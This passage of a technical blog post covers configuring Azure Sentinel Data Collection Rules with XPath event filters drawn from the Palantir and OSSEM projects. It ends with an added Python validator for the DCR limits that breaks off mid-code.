data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_13-1624563350637.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291061iD3FA95B731C7D4A2/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_13-1624563350637.png" alt="Cyb3rWard0g_13-1624563350637.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_14-1624563350638.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291062iC6882B6F8D19BD76/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_14-1624563350638.png" alt="Cyb3rWard0g_14-1624563350638.png" /></span></P> <P>&nbsp;</P> <H2><SPAN data-contrast="none">Verify Lab Resources</SPAN><SPAN>&nbsp;</SPAN></H2> <H3>&nbsp;</H3> <P><SPAN data-contrast="none">Once your environment is deployed successfully, I recommend verifying every resource that was deployed.</SPAN></P> <H3>&nbsp;</H3> <H3><SPAN data-contrast="none">Azure Sentinel New Data Connector</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You will see the <STRONG>Windows Security Events (Preview)</STRONG>&nbsp;data connector enabled with a custom <STRONG>Data Collection Rules (DCR)</STRONG>:</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_15-1624563350665.png" style="width: 999px;"><img 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291065i883D30E9F4EF7004/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_15-1624563350665.png" alt="Cyb3rWard0g_15-1624563350665.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">If you edit the custom DCR, you will see the XPath query and the resource it is associated with. The image below shows the association of the DCR with a machine named <STRONG>workstation5</STRONG>.</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_16-1624563350641.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291064iF2D12F48A6172688/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_16-1624563350641.png" alt="Cyb3rWard0g_16-1624563350641.png" /></span></P> <P>&nbsp;</P> <P>You can also see that the data collection is set to <STRONG>custom</STRONG> and, for this example, we only set the event stream to collect events with <STRONG>Event ID 4624</STRONG>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_17-1624563350642.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291066i01C988E45895710D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_17-1624563350642.png" alt="Cyb3rWard0g_17-1624563350642.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="3"><SPAN data-contrast="none">Windows Workstation</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">I recommend connecting to the Windows workstation over RDP using its public IP address. Go to your resource group and select the Azure VM. 
You should see the public IP address to the right of the screen. This&nbsp;would generate authentication events&nbsp;which will be captured by the custom DCR associated with the endpoint.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_18-1624563350668.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291069iD97997E8318B9A70/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_18-1624563350668.png" alt="Cyb3rWard0g_18-1624563350668.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="3"><SPAN data-contrast="none">Check Azure Sentinel Logs</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Go back to your Azure Sentinel, and you should start seeing some events&nbsp;on&nbsp;the <STRONG>Overview</STRONG> page:</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_19-1624563350654.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291067i569F3D73FA0B5308/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_19-1624563350654.png" alt="Cyb3rWard0g_19-1624563350654.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Go to <STRONG>Logs</STRONG> and run the following KQL query:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">SecurityEvent</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">| summarize&nbsp;count() 
by&nbsp;EventID</SPAN></PRE> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">As you can see in the image below, only events with Event ID 4624 were&nbsp;collected by the Azure Monitor Agent.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_20-1624563350656.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291068i864394B23E3318B9/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_20-1624563350656.png" alt="Cyb3rWard0g_20-1624563350656.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You might be asking yourself, “<STRONG>Who would only&nbsp;want to&nbsp;collect events with Event ID 4624 from a Windows endpoint?</STRONG>”. Believe it or not, there are network environments where, due to bandwidth constraints, only certain events can be collected. Therefore, this custom filtering capability is amazing and very useful: it covers more use cases and even saves storage!</SPAN><SPAN><BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1">&nbsp;</H2> <H2 aria-level="1"><SPAN data-contrast="none">Any Good XPath Query&nbsp;Repositories&nbsp;in the InfoSec Community?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Now that we know the internals of the new connector and how to deploy a simple lab environment, we can test multiple XPath queries depending on your organization's use&nbsp;cases, research needs and bandwidth constraints. 
There are a few projects that you can use.</SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">Palantir WEF Subscriptions</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">One of many repositories&nbsp;out there that contain XPath queries&nbsp;is the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">‘windows-event-forwarding’ project</SPAN></A><SPAN data-contrast="auto">&nbsp;from Palantir. The XPath queries are inside&nbsp;the&nbsp;Windows Event Forwarding (WEF) subscriptions.&nbsp;We can take all the subscriptions, parse them&nbsp;programmatically&nbsp;to extract&nbsp;every&nbsp;XPath query, and save the queries in&nbsp;a format that can be used as part of the automated deployment.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You can follow the steps in the document below, available in Azure Sentinel To-go, to extract the XPath queries from the Palantir project.</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/README.md at master · OTRF/Azure-Sentinel2Go (github.com)</A>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="2"><SPAN data-contrast="none">OSSEM Detection Model + ATT&amp;CK Data Sources</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">From a community perspective, another great resource from which you can extract XPath queries is the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Open Source Security Event Metadata (OSSEM) Detection Model 
(DM)&nbsp;project</SPAN></A><SPAN data-contrast="auto">, a community-driven effort to&nbsp;help researchers&nbsp;model attack behaviors from a data perspective and share&nbsp;relationships identified in security events across several operating systems.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">One of the use cases from this initiative is&nbsp;to map all security events in the project to the new&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">‘Data Sources’&nbsp;objects provided by the MITRE ATT&amp;CK framework</SPAN></A><SPAN data-contrast="auto">.&nbsp;In the image below, we can see how the&nbsp;OSSEM DM project&nbsp;provides&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">an interactive document</SPAN></A><SPAN data-contrast="auto">&nbsp;(.CSV)&nbsp;for researchers to explore the&nbsp;mappings (research output):</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_21-1624563350666.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291073iD31791A72DDC6086/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_21-1624563350666.png" alt="Cyb3rWard0g_21-1624563350666.png" /></span></P> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">One of the advantages of this project over others is that <A href="#" target="_self">all its data relationships</A> are in YAML format, which&nbsp;makes it easy to translate them to other formats such as <STRONG>XML</STRONG>. 
We can&nbsp;use the Event IDs defined in each <A href="#" target="_self">data relationship documented in OSSEM DM</A> and create XML files with XPath queries in them.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">Exploring OSSEM DM Relationships (YAML Files)</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Let’s say we&nbsp;want to&nbsp;use&nbsp;<A href="#" target="_self">relationships related to scheduled jobs</A> in Windows.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_22-1624563350657.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291072i5E213CB9FE4AD5ED/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_22-1624563350657.png" alt="Cyb3rWard0g_22-1624563350657.png" /></span></P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Translate YAML files to XML Query Lists</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">We can process all the YAML files and export the data to&nbsp;XML&nbsp;files.&nbsp;One thing I like about this OSSEM DM use case is that we can group the XML files by <A href="#" target="_self">ATT&amp;CK data sources</A>. This can help organizations organize their data collection in a way that can be mapped internally to detections or other ATT&amp;CK-based frameworks.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We can use the <STRONG>QueryList</STRONG> format&nbsp;to document all '<STRONG>scheduled jobs relationships</STRONG>' XPath queries&nbsp;in one XML file.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_23-1624563350647.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291071i4E91B0701CDD9BC8/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_23-1624563350647.png" alt="Cyb3rWard0g_23-1624563350647.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">I like to document my XPath queries in this format first because it expedites validating them locally on a Windows endpoint. You can pass that XML file to a PowerShell command that queries Windows Security events&nbsp;and confirms there are no syntax issues:</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE>[xml]$scheduledjobs = Get-Content .\scheduled-job.xml<BR />Get-WinEvent -FilterXml $scheduledjobs</PRE> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_0-1624585337804.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291165i34FCF0A62CCE47DC/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_0-1624585337804.png" alt="Cyb3rWard0g_0-1624585337804.png" /></span></P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Translate XML Query Lists to DCR&nbsp;Data&nbsp;Source:</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Finally, once the XPath queries have been validated, we could simply extract them from the XML files and put them in a format that 
could be used in ARM templates to create DCRs.&nbsp;&nbsp;Do you remember&nbsp;the <STRONG>dataSources</STRONG>&nbsp;property of the DCR Azure resource&nbsp;we talked about earlier? What if we could get the values of the <STRONG>windowsEventLogs</STRONG>&nbsp;data source directly from a file&nbsp;instead of hardcoding them in an ARM template?</SPAN><SPAN>&nbsp;The example below is how it was previously being hardcoded.<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE><SPAN data-contrast="none">"dataSources": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "windowsEventLogs": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "name": "eventLogsDataSource",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "scheduledTransferPeriod": "PT5M",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "streams": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Microsoft-SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "xPathQueries": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4624)]]"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">}</SPAN><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">We could use the XML files created after processing the OSSEM DM relationships mapped to ATT&amp;CK&nbsp;data sources&nbsp;to create the following document. We can then pass the URL of the document as a parameter to an ARM template to deploy our lab environment:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/ossem-attack.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></SPAN></P> <P>&nbsp;</P> <H2><SPAN data-contrast="none">Wait! How Do You&nbsp;Create the Document?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">The <A href="#" target="_self">OSSEM&nbsp;team</A>&nbsp;is contributing&nbsp;and maintaining&nbsp;<A href="#" target="_self">the&nbsp;JSON file</A>&nbsp;from the previous section&nbsp;in the&nbsp;<A href="#" target="_self">Azure Sentinel2Go repository</A>.&nbsp;However, if you want to go through the whole process on your own, Jose Rodriguez (</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">@Cyb3rpandah</SPAN></A><SPAN data-contrast="auto">)&nbsp;was&nbsp;kind enough to write up every single step&nbsp;to get to that output file in the following blog post:</SPAN><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">OSSEM Detection Model: Leveraging Data Relationships to Generate Windows Event XPath Queries (openthreatresearch.com)</A></SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">Ok, But, How Do 
I&nbsp;Pass&nbsp;the JSON file&nbsp;to&nbsp;our Initial&nbsp;ARM template?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In our <A href="#" target="_self">initial ARM template</A>, we had the XPath query&nbsp;as&nbsp;an ARM template variable as shown in the image below.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_1-1624585923557.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291167i9C07EB631AAF2443/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_1-1624585923557.png" alt="Cyb3rWard0g_1-1624585923557.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We could also have it as a template parameter. However, it is <STRONG>not flexible&nbsp;enough to define multiple DCRs or even update the whole DCR Data Source object</STRONG>&nbsp;(Think about future coverage beyond Windows logs).</SPAN><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <H2 aria-level="2"><SPAN data-contrast="none">Data Collection Rules – CREATE API</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">For more complex use cases, I would use the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">DCR Create API.</SPAN></A><SPAN data-contrast="auto">&nbsp;This can be&nbsp;executed&nbsp;via a PowerShell script which can also&nbsp;be&nbsp;used inside of an ARM template&nbsp;via&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">deployment scripts</SPAN></A><SPAN data-contrast="auto">. 
Keep in mind that the deployment script resource requires an identity to execute the script.&nbsp;This <A href="#" target="_self">user-assigned managed identity</A> can be created at deployment time and used to create the DCRs&nbsp;programmatically.</SPAN><SPAN><BR /></SPAN></P> <H3 aria-level="2">&nbsp;</H3> <H3 aria-level="2"><SPAN data-contrast="none">PowerShell Script</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">If you have an Azure Sentinel instance without the data connector enabled, you can use the&nbsp;<A href="#" target="_self">following PowerShell script</A></SPAN><SPAN data-contrast="auto">&nbsp;to create DCRs in it. This is good for testing, and it also works in ARM templates. </SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Keep in mind that you need a file that defines the structure of the <STRONG>windowsEventLogs</STRONG>&nbsp;data source object used in the creation of DCRs. We created that in the previous section, remember? </SPAN><SPAN data-contrast="auto">Here is where we can use the OSSEM Detection Model XPath Queries File&nbsp;</SPAN><SPAN data-contrast="auto">;)</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/ossem-attack.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">FileExample.json</SPAN></STRONG></P> <P>&nbsp;</P> <PRE>{
  "windowsEventLogs": [
    {
      "Name": "eventLogsDataSource",
      "scheduledTransferPeriod": "PT1M",
      "streams": [
        "Microsoft-SecurityEvent"
      ],
      "xPathQueries": [
        "Security!*[System[(EventID=5141)]]",
        "Security!*[System[(EventID=5137)]]",
        "Security!*[System[(EventID=5136 or EventID=5139)]]",
        "Security!*[System[(EventID=4688)]]",
        "Security!*[System[(EventID=4660)]]",
        "Security!*[System[(EventID=4656 or EventID=4661)]]",
        "Security!*[System[(EventID=4670)]]"
      ]
    }
  ]
}</PRE> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Run Script</SPAN></STRONG></P> <P>Once you have a JSON file similar to the one in the previous section, you can run the script from a PowerShell console (xxxx stands for your own workspace values):</P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">.\Create-DataCollectionRules.ps1 -WorkspaceId xxxx -WorkspaceResourceId xxxx -ResourceGroup MYGROUP -Kind Windows -DataCollectionRuleName WinDCR -DataSourcesFile FileExample.json -Location eastus -Verbose</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">One thing to remember is&nbsp;that you can&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">only have 10 Data Collection rules</SPAN></STRONG><SPAN data-contrast="auto">. 
That is different than&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">XPath queries inside of one DCR</SPAN></STRONG><SPAN data-contrast="auto">. If you&nbsp;attempt to&nbsp;create more than 10 DCRs, you will get the following error message:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="none">ERROR</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;<BR /><BR /></SPAN><SPAN data-contrast="auto">VERBOSE:&nbsp;@{Headers=System.Object[]; Version=1.1;&nbsp;StatusCode=400; Method=PUT;&nbsp;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Content={"error":{"code":"InvalidPayload","message":"Data&nbsp;collection rule is&nbsp;invalid","details":[{"code":"InvalidProperty","message":"'Data&nbsp;Sources. Windows Event Logs' item count should be 10 or less. Specified list has 11 items.","target":"Properties.DataSources.WindowsEventLogs"}]}}}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Also, if you have duplicate XPath queries in one DCR, you would&nbsp;get the following message:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="none">ERROR</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><BR /></SPAN><SPAN data-contrast="auto">VERBOSE:&nbsp;@{Headers=System.Object[]; Version=1.1;&nbsp;StatusCode=400; Method=PUT;&nbsp;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Content={"error":{"code":"InvalidPayload","message":"Data&nbsp;collection rule is&nbsp;invalid","details":[{"code":"InvalidDataSource","message":"'X&nbsp;Path Queries' items must be unique 
(case-insensitively).&nbsp;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Duplicate names:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;<BR />Security!*[System[(EventID=4688)]],Security!*[System[(EventID=4656)]].","target":"Properties.DataSources.WindowsEventLogs[0].XPathQueries"}]}}}&nbsp;<BR /></SPAN></PRE> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="2"><SPAN data-contrast="none">ARM Template:&nbsp;DeploymentScript</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;Resource</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Now that you know how to use a PowerShell script to create DCRs directly in your Azure Sentinel instance, we can use it inside of an ARM template and make it point to the JSON file that contains all the XPath queries contributed by the OSSEM DM project, already in the right format. </SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">This is the template I use to put it all together:</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/Win10-DCR-DeploymentScript.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">What about the DCR Associations?&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">You still need to associate the DCR with a virtual machine. However, we can keep doing that within the template by referencing the <A href="#" target="_self">DCRAs Azure resource linked template</A>&nbsp;inside of the main template. 
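The two API errors quoted above define the constraints the data-sources file has to satisfy before the script PUTs it: at most 10 entries in the windowsEventLogs list, and no XPath query repeated case-insensitively within an entry. The Python pre-flight check below is an added example, not part of Azure-Sentinel2Go or of the Create-DataCollectionRules.ps1 script. It assumes the file is shaped like the fragment in the previous section (a top-level windowsEventLogs array whose entries carry an xPathQueries list); the entry names and stream values in the constructed samples are placeholders.

```python
"""Pre-flight checks for a DCR data-sources JSON file.

Added example, not code from the Azure-Sentinel2Go project. The two rules
come from the API error messages quoted on the page: at most 10 entries in
dataSources.windowsEventLogs, and XPath queries inside one entry must be
unique case-insensitively. The file layout (a top-level "windowsEventLogs"
array of entries, each with an "xPathQueries" list) is an assumption about
the script's input file.
"""
import json

MAX_WINDOWS_EVENT_LOG_ITEMS = 10  # "item count should be 10 or less"


def find_duplicate_xpaths(xpath_queries):
    """Return the queries that repeat case-insensitively, in first-seen form and order."""
    first_seen = {}
    duplicates = []
    for query in xpath_queries:
        key = query.casefold()
        if key in first_seen:
            if first_seen[key] not in duplicates:
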